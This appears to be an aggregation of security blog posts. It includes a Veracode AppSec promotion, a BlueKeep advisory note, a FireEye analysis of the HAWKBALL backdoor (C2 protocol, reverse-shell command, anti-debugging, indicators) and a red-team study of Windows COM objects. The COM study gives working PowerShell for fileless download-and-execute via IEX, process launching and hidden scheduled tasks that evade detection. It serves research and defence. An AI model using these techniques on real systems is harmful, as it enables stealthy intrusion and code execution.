SOSS Vol. 9 shows that the financial industry, while boasting the largest population of applications under test and with a reputation of maintaining some of the most mature AppSec programs, is struggling to meet AppSec standards. The industry ranks second to last in major verticals examined for OWASP pass rate on latest scan, and based on flaw persistence analysis, it’s leaving flaws to linger longer than other industries do.

In order for hospitals and healthcare organizations to ensure the security of those they care for, they need to be able to trust that the third-party vendors and service providers that they enlist to take payments and process claims are taking the appropriate precautions when it comes to software security.

Awareness begets progress

In 2017, Veracode conducted research with YouGov to better understand how well business leaders understood the cybersecurity risks they are introducing to their company as a result of digital transformation and participation in the global economy. What we found was that awareness was low – even following the Equifax breach that occurred that year. The research showed that only 28 percent of respondents had heard of the attack.

Since then, we’ve seen a number of CEOs and other executives paying the price after a breach. Veracode CTO, EMEA, Paul Farrington, said it best:

“Ultimately, this is merely an extension of expectations on the C-Suite when responding to serious events. If CEOs violate environmental, health, or safety standards, they can be fined, and even jailed in many countries. Perfect security is not possible, but with data about our entire lives now being stored and processed by businesses, it is essential that employees and customers alike are afforded a certain standard of cybersecurity. When such standards aren’t met, there out to be accountability at a senior level.”

As healthcare organizations and hospitals are doing an increased level of due diligence before making a purchase or partnering with third parties, we can expect that other industries are likely to follow suit. Executives will begin to add security to their list of priorities, because it will be demanded by the board in an effort to protect their brand and bottom line.

Give your customers confidence that your software is secure

Given that perfect security isn’t possible, organizations should consider reviewing their software development processes to ensure that security is embedded in each stage. One of the reasons that we created Veracode Verified, which helps your organization prove at a glance that you’ve made security a priority, is to help organizations stay ahead of customer and prospect security concerns and speed up sales cycles – without straining limited security resources. The program provides you with a proven roadmap for maturing your application security program, as well as an attestation letter you can share with customers and prospects.

Curious to learn more about how your organization may benefit from Veracode Verified? Have a look at this infographic to get the details.

Australian Cyber Security Centre advises Windows users across Australia to protect against BlueKeep

The ACSC is aware of Microsoft’s recent disclosure of a remote desktop vulnerability called CVE-2019-0708, also known as BlueKeep. As an indication of just how significant the impacts of BlueKeep can be to their customers, Microsoft took the unusual step of publishing advice to warn of its ability to propagate or ‘worm’ through vulnerable computer systems, with no user interaction at all.

Government Sector in Central Asia Targeted With New HAWKBALL Backdoor Delivered via Microsoft Office Vulnerabilities

FireEye Labs recently observed an attack against the government sector in Central Asia. The attack involved the new HAWKBALL backdoor being delivered via well-known Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802.

HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives.

Figure 1 shows the decoy used in the attack.


Figure 1: Decoy used in attack

The decoy file, doc.rtf (MD5: AC0EAC22CE12EAC9EE15CA03646ED70C), contains an OLE object that uses Equation Editor to drop the embedded shellcode in %TEMP% with the name 8.t. This shellcode is decrypted in memory through EQENDT32.EXE. Figure 2 shows the decryption mechanism used in EQENDT32.EXE.


Figure 2: Shellcode decryption routine

The decrypted shellcode is dropped as a Microsoft Word plugin WLL (MD5: D90E45FBF11B5BBDCA945B24D155A4B2) into C:\Users\ADMINI~1\AppData\Roaming\Microsoft\Word\STARTUP (Figure 3).


Figure 3: Payload dropped as Word plugin

Technical Details

DllMain of the dropped payload determines if the string WORD.EXE is present in the sample’s command line. If the string is not present, the malware exits. If the string is present, the malware executes the command RunDll32.exe < C:\Users\ADMINI~1\AppData\Roaming\Microsoft\Word\STARTUP\hh14980443.wll, DllEntry> using the WinExec() function.

DllEntry is the payload’s only export function. The malware creates a log file in %TEMP% with the name c3E57B.tmp. The malware writes the current local time plus two hardcoded values every time in the following format:

<Month int>/<Date int> <Hours>:<Minutes>:<Seconds>\t<Hardcoded Digit>\t<Hardcoded Digit>\n

Example:

05/22 07:29:17 4          0

This log file is written to every 15 seconds. The last two digits are hard coded and passed as parameters to the function (Figure 4).


Figure 4: String format for log file

The encrypted file contains a config file of 0x78 bytes. The data is decrypted with an 0xD9 XOR operation. The decrypted data contains command and control (C2) information as well as a mutex string used during malware initialization. Figure 5 shows the decryption routine and decrypted config file.


Figure 5: Config decryption routine

The IP address from the config file is written to %TEMP%/3E57B.tmp with the current local time. For example:

05/22 07:49:48 149.28.182.78.

Mutex Creation

The malware creates a mutex to prevent multiple instances of execution. Before naming the mutex, the malware determines whether it is running as a system profile (Figure 6). To verify that the malware resolves the environment variable for %APPDATA%, it checks for the string config/systemprofile.


Figure 6: Verify whether malware is running as a system profile

If the malware is running as a system profile, the string d0c from the decrypted config file is used to create the mutex. Otherwise, the string _cu is appended to d0c and the mutex is named d0c_cu (Figure 7).


Figure 7: Mutex creation

After the mutex is created, the malware writes another entry in the logfile in %TEMP% with the values 32 and 0.

Network Communication

HAWKBALL is a backdoor that communicates to a single hard-coded C2 server using HTTP. The C2 server is obtained from the decrypted config file, as shown in Figure 5. The network request is formed with hard-coded values such as User-Agent. The malware also sets the other fields of request headers such as:

  • Content-Length: <content_length>
  • Cache-Control: no-cache
  • Connection: close

The malware sends an HTTP GET request to its C2 IP address using HTTP over port 443. Figure 8 shows the GET request sent over the network.


Figure 8: Network request

The network request is formed with four parameters in the format shown in Figure 9.

Format = "?t=%d&&s=%d&&p=%s&&k=%d"


Figure 9: GET request parameters formation

Table 1 shows the GET request parameters.

Value

Information

T

Initially set to 0

S

Initially set to 0

P

String from decrypted config at 0x68

k

The result of GetTickCount()

Table 1: GET request parameters

If the returned response is 200, then the malware sends another GET request (Figure 10) with the following parameters (Figure 11).

Format = "?e=%d&&t=%d&&k=%d"


Figure 10: Second GET request


Figure 11: Second GET request parameters formation

Table 2 shows information about the parameters.

Value

Information

E

Initially Set to 0

T

Initially set to 0

K

The result of GetTickCount()

Table 2: Second GET request parameters

If the returned response is 200, the malware examines the Set-Cookie field. This field provides the Command ID. As shown in Figure 10, the field Set-Cookie responds with ID=17.

This Command ID acts as the index into a function table created by the malware. Figure 12 shows the creation of the virtual function table that will perform the backdoor’s command.


Figure 12: Function table

Table 3 shows the commands supported by HAWKBALL.

Command

Operation Performed

0

Set URI query string to value

16

Unknown

17

Collect system information

18

Execute a provided argument using CreateProcess

19

Execute a provided argument using CreateProcess and upload output

20

Create a cmd.exe reverse shell, execute a command, and upload output

21

Shut down reverse shell

22

Unknown

23

Shut down reverse shell

48

Download file

64

Get drive geometry and free space for logical drives C-Z

65

Retrieve information about provided directory

66

Delete file

67

Move file

Table 3: HAWKBALL commands

Collect System Information

Command ID 17 indexes to a function that collects the system information and sends it to the C2 server. The system information includes:

  • Computer Name
  • User Name
  • IP Address
  • Active Code Page
  • OEM Page
  • OS Version
  • Architecture Details (x32/x64)
  • String at 0x68 offset from decrypted config file

This information is retrieved from the victim using the following WINAPI calls:

Format = "%s;%s;%s;%d;%d;%s;%s %dbit"

  • GetComputerNameA
  • GetUserNameA
  • Gethostbyname and inet_ntoa
  • GetACP
  • GetOEMPC
  • GetCurrentProcess and IsWow64Process


Figure 13: System information

The collected system information is concatenated together with a semicolon separating each field:

WIN732BIT-L-0;Administrator;10.128.62.115;1252;437;d0c;Windows 7 32bit

This information is encrypted using an XOR operation. The response from the second GET request is used as the encryption key. As shown in Figure 10, the second GET request responds with a 4-byte XOR key. In this case the key is 0xE5044C18.

Once encrypted, the system information is sent in the body of an HTTP POST. Figure 14 shows data sent over the network with the POST request.


Figure 14: POST request

In the request header, the field Cookie is set with the command ID of the command for which the response is sent. As shown in Figure 14, the Cookie field is set with ID=17, which is the response for the previous command. In the received response, the next command is returned in field Set-Cookie.

Table 4 shows the parameters of this POST request.

Parameter

Information

E

Initially set to 0

T

Decimal form of the little-endian XOR key

K

The result of GetTickCount()

Table 4: POST request parameters

Create Process

The malware creates a process with specified arguments. Figure 15 shows the operation.


Figure 15: Command create process

Delete File

The malware deletes the file specified as an argument. Figure 16 show the operation.


Figure 16: Delete file operation

Get Directory Information

The malware gets information for the provided directory address using the following WINAPI calls:

  • FindFirstFileW
  • FindNextFileW
  • FileTimeToLocalFileTime
  • FiletimeToSystemTime

Figure 17 shows the API used for collecting information.


Figure 17: Get directory information

Get Disk Information

This command retrieves the drive information for drives C through Z along with available disk space for each drive.


Figure 18: Retrieve drive information

The information is stored in the following format for each drive:

Format = "%d+%d+%d+%d;"

Example: "8+512+6460870+16751103;"

The information for all the available drives is combined and sent to the server using an operation similar to Figure 14.

Anti-Debugging Tricks

Debugger Detection With PEB

The malware queries the value for the flag BeingDebugged from PEB to check whether the process is being debugged.


Figure 19: Retrieve value from PEB

NtQueryInformationProcess

The malware uses the NtQueryInformationProcess API to detect if it is being debugged. The following flags are used:

  • Passing value 0x7 to ProcessInformationClass:


Figure 20: ProcessDebugPort verification

  • Passing value 0x1E to ProcessInformationClass:


Figure 21: ProcessDebugFlags verification

  • Passing value 0x1F to ProcessInformationClass:


Figure 22: ProcessDebugObject

Conclusion

HAWKBALL is a new backdoor that provides features attackers can use to collect information from a victim and deliver new payloads to the target. At the time of writing, the FireEye Multi-Vector Execution (MVX) engine is able to recognize and block this threat. We advise that all industries remain on alert, though, because the threat actors involved in this campaign may eventually broaden the scope of their current targeting.

Indicators of Compromise (IOC)

MD5

Name

AC0EAC22CE12EAC9EE15CA03646ED70C

Doc.rtf

D90E45FBF11B5BBDCA945B24D155A4B2

hh14980443.wll

Network Indicators

  • 149.28.182[.]78:443
  • 149.28.182[.]78:80
  • http://149.28.182[.]78/?t=0&&s=0&&p=wGH^69&&k=<tick_count>
  • http://149.28.182[.]78/?e=0&&t=0&&k=<tick_count>
  • http://149.28.182[.]78/?e=0&&t=<int_xor_key>&&k=<tick_count>
  • Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)

FireEye Detections

MD5

Product

Signature

Action

AC0EAC22CE12EAC9EE15CA03646ED70C

FireEye Email Security

FireEye Network Security

FireEye Endpoint Security

FE_Exploit_RTF_EQGEN_7

Exploit.Generic.MVX

Block

D90E45FBF11B5BBDCA945B24D155A4B2

FireEye Email Security

FireEye Network Security

FireEye Endpoint Security

Malware.Binary.Dll

FE_APT_Backdoor_Win32_HawkBall_1

APT.Backdoor.Win.HawkBall

Block

Acknowledgement

Thank you to Matt Williams for providing reverse engineering support.

Hunting COM Objects

COM objects have recently been used by penetration testers, Red Teams, and malicious actors to perform lateral movement. COM objects were studied by several other researchers in the past, including Matt Nelson (enigma0x3), who published a blog post about it in 2017. Some of these COM objects were also added to the Empire project. To improve the Red Team practice, FireEye performed research into the available COM objects on Windows 7 and 10 operating systems. Several interesting COM objects were discovered that allow task scheduling, fileless download & execute as well as command execution. Although not security vulnerabilities on their own, usage of these objects can be used to defeat detection based on process behavior and heuristic signatures.

What is a COM Object?

According to Microsoft, “The Microsoft Component Object Model (COM) is a platform-independent, distributed, object-oriented system for creating binary software components that can interact. COM is the foundation technology for Microsoft's OLE (compound documents), ActiveX (Internet-enabled components), as well as others.”

COM was created in the 1990’s as language-independent binary interoperability standard which enables separate code modules to interact with each other. This can occur within a single process or cross-process, and Distributed COM (DCOM) adds serialization allowing Remote Procedure Calls across the network.

The term “COM Object” refers to an executable code section which implements one or more interfaces deriving from IUnknown.  IUnknown is an interface with 3 methods, which support object lifetime reference counting and discovery of additional interfaces.  Every COM object is identified by a unique binary identifier. These 128 bit (16 byte) globally unique identifiers are generically referred to as GUIDs.  When a GUID is used to identify a COM object, it is a CLSID (class identifier), and when it is used to identify an Interface it is an IID (interface identifier). Some CLSIDs also have human-readable text equivalents called a ProgID.

Since COM is a binary interoperability standard, COM objects are designed to be implemented and consumed from different languages.  Although they are typically instantiated in the address space of the calling process, there is support for running them out-of-process with inter-process communication proxying the invocation, and even remotely from machine to machine.

The Windows Registry contains a set of keys which enable the system to map a CLSID to the underlying code implementation (in a DLL or EXE) and thus create the object.

Methodology

The registry key HKEY_CLASSES_ROOT\CLSID exposes all the information needed to enumerate COM objects, including the CLSID and ProgID. The CLSID is a globally unique identifier associated with a COM class object. The ProgID is a programmer-friendly string representing an underlying CLSID.

The list of CLSIDs can be obtained using the following Powershell commands in Figure 1.

New-PSDrive -PSProvider registry -Root HKEY_CLASSES_ROOT -Name HKCR
Get-ChildItem -Path HKCR:\CLSID -Name | Select -Skip 1 > clsids.txt

Figure 1: Enumerating CLSIDs under HKCR

The output will resemble Figure 2.

{0000002F-0000-0000-C000-000000000046}
{00000300-0000-0000-C000-000000000046}
{00000301-A8F2-4877-BA0A-FD2B6645FB94}
{00000303-0000-0000-C000-000000000046}
{00000304-0000-0000-C000-000000000046}
{00000305-0000-0000-C000-000000000046}
{00000306-0000-0000-C000-000000000046}
{00000308-0000-0000-C000-000000000046}
{00000309-0000-0000-C000-000000000046}
{0000030B-0000-0000-C000-000000000046}
{00000315-0000-0000-C000-000000000046}
{00000316-0000-0000-C000-000000000046}

Figure 2:Abbreviated list of CLSIDs from HKCR

We can use the list of CLSIDs to instantiate each object in turn, and then enumerate the methods and properties exposed by each COM object. PowerShell exposes the Get-Member cmdlet that can be used to list methods and properties on an object easily. Figure 3 shows a PowerShell script to enumerate this information. Where possible in this study, standard user privileges were used to provide insight into available COM objects under the worst-case scenario of having no administrative privileges.

$Position  = 1
$Filename = "win10-clsid-members.txt"
$inputFilename = "clsids.txt"
ForEach($CLSID in Get-Content $inputFilename) {
      Write-Output "$($Position) - $($CLSID)"
      Write-Output "------------------------" | Out-File $Filename -Append
      Write-Output $($CLSID) | Out-File $Filename -Append
      $handle = [activator]::CreateInstance([type]::GetTypeFromCLSID($CLSID))
      $handle | Get-Member | Out-File $Filename -Append
      $Position += 1
}

Figure 3: PowerShell scriptlet used to enumerate available methods and properties

If you run this script, expect some interesting side-effect behavior such as arbitrary applications being launched, system freezes, or script hangs. Most of these issues can be resolved by closing the applications that were launched or by killing the processes that were spawned.

Armed with a list of all the CLSIDs and the methods and properties they expose, we can begin the hunt for interesting COM objects. Most COM servers (code implementing a COM object) are implemented in a DLL whose path is stored in the registry key e.g. under InprocServer32. This is useful because reverse engineering may be required to understand undocumented COM objects.

On Windows 7, a total of 8,282 COM objects were enumerated. Windows 10 featured 3,250 new COM objects in addition to those present on Windows 7. Non-Microsoft COM objects were generally omitted because they cannot be reliably expected to be present on target machines, which limits their usefulness to Red Team operations. Selected Microsoft COM objects from the Windows SDK were included in the study for purposes of targeting developer machines.

Once the members were obtained, a keyword-based search approach was used to quickly yield results. For the purposes of this research, the following keywords were used: execute, exec, spawn, launch, and run.

One example was the {F1CA3CE9-57E0-4862-B35F-C55328F05F1C} COM object (WatWeb.WatWebObject) on Windows 7. This COM object exposed a method named LaunchSystemApplication as shown in Figure 4.


Figure 4: WatWeb.WatWebObject methods including the interesting LaunchSystemApplication method

The InprocServer32 entry for this object was set to C:\windows\system32\wat\watweb.dll, which is part of Microsoft’s Windows Genuine Advantage product key validation system. The LaunchSystemApplication method expected three parameters, but this COM object was not well-documented and reverse engineering was required, meaning it was time to dig through some assembly code.

Once C:\windows\system32\wat\watweb.dll is loaded in your favorite tool (in this case, IDA Pro), it’s time to find where this method is defined. Luckily, in this case, Microsoft exposed debugging symbols, making the reverse engineering much more efficient. Looking at the disassembly, LaunchSystemApplication calls LaunchSystemApplicationInternal, which, as one might suspect, calls CreateProcess to launch an application. This is shown in the Hex-Rays decompiler pseudocode in Figure 5.


Figure 5: Hex-Rays pseudocode confirming that LaunchSystemApplicationInternal calls CreateProcessW

But does this COM object allow creation of arbitrary processes? The argument passed to CreateProcess is user-controlled and is derived from the arguments passed to the function. However, notice the call to CWgpOobWebObjectBaseT::IsApprovedApplication prior to the CreateProcess call. The Hex-Rays pseudocode for this method is shown in Figure 6.


Figure 6: Hex-Rays pseudocode for the IsApprovedApplication method

The user-controlled string is validated against a specific pattern. In this case, the string must match slui.exe. Furthermore, the user-controlled string is then appended to the system path, meaning it would be necessary to, for instance, replace the real slui.exe to circumvent the check. Unfortunately, the validation performed by Microsoft limits the usefulness of this method as a general-purpose process launcher.

In other cases, code execution was straightforward. For example, the ProcessChain Class with CLSID {E430E93D-09A9-4DC5-80E3-CBB2FB9AF28E} that is implemented in C:\Program Files (x86)\Windows Kits\10\App Certification Kit\prchauto.dll. This COM class can be readily analyzed without looking at any disassembly listings, because prchauto.dll contains a TYPELIB resource containing a COM Type Library that can be viewed using Oleview.exe. Figure 7 shows the type library for ProcessChainLib, exposing a CommandLine property and a Start method. Start accepts a reference to a Boolean value.


Figure 7: Type library for ProcessChainLib as displayed in Interface Definition Language by Oleview.exe

Based on this, commands can be started as shown in Figure 8.

$handle = [activator]::CreateInstance([type]::GetTypeFromCLSID("E430E93D-09A9-4DC5-80E3-CBB2FB9AF28E"))
$handle.CommandLine = "cmd /c whoami"
$handle.Start([ref]$True)

Figure 8: Using the ProcessChainLib COM server to start a process

Enumerating and examining COM objects in this fashion turned up other interesting finds as well.

Fileless Download and Execute

For instance, the COM object {F5078F35-C551-11D3-89B9-0000F81FE221} (Msxml2.XMLHTTP.3.0) exposes an XML HTTP 3.0 feature that can be used to download arbitrary code for execution without writing the payload to the disk and without triggering rules that look for the commonly-used System.Net.WebClient. The XML HTTP 3.0 object is usually used to perform AJAX requests. In this case, data fetched can be directly executed using the Invoke-Expression cmdlet (IEX).

The example in Figure 9 executes our code locally:

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221")); $o.Open("GET", "http://127.0.0.1/payload", $False); $o.Send(); IEX $o.responseText;

Figure 9: Fileless download without System.Net.WebClient

Task Scheduling

Another example is {0F87369F-A4E5-4CFC-BD3E-73E6154572DD} which implements the Schedule.Service class for operating the Windows Task Scheduler Service. This COM object allows privileged users to schedule a task on a host (including a remote host) without using the schtasks.exe binary or the at command.

$TaskName = [Guid]::NewGuid().ToString()
$Instance = [activator]::CreateInstance([type]::GetTypeFromProgID("Schedule.Service"))
$Instance.Connect()
$Folder = $Instance.GetFolder("\")
$Task = $Instance.NewTask(0)
$Trigger = $Task.triggers.Create(0)
$Trigger.StartBoundary = Convert-Date -Date ((Get-Date).addSeconds($Delay))
$Trigger.EndBoundary = Convert-Date -Date ((Get-Date).addSeconds($Delay + 120))
$Trigger.ExecutionTimelimit = "PT5M"
$Trigger.Enabled = $True
$Trigger.Id = $Taskname
$Action = $Task.Actions.Create(0)
$Action.Path = “cmd.exe”
$Action.Arguments = “/c whoami”
$Action.HideAppWindow = $True
$Folder.RegisterTaskDefinition($TaskName, $Task, 6, "", "", 3)

function Convert-Date {       

        param(
             [datetime]$Date

        )       

        PROCESS {
               $Date.Touniversaltime().tostring("u") -replace " ","T"
        }
}

Figure 10: Scheduling a task

Conclusion

COM objects are very powerful, versatile, and integrated with Windows, which means that they are nearly always available. COM objects can be used to subvert different detection patterns including command line arguments, PowerShell logging, and heuristic detections. Stay tuned for part 2 of this blog series as we will continue to look at hunting COM objects.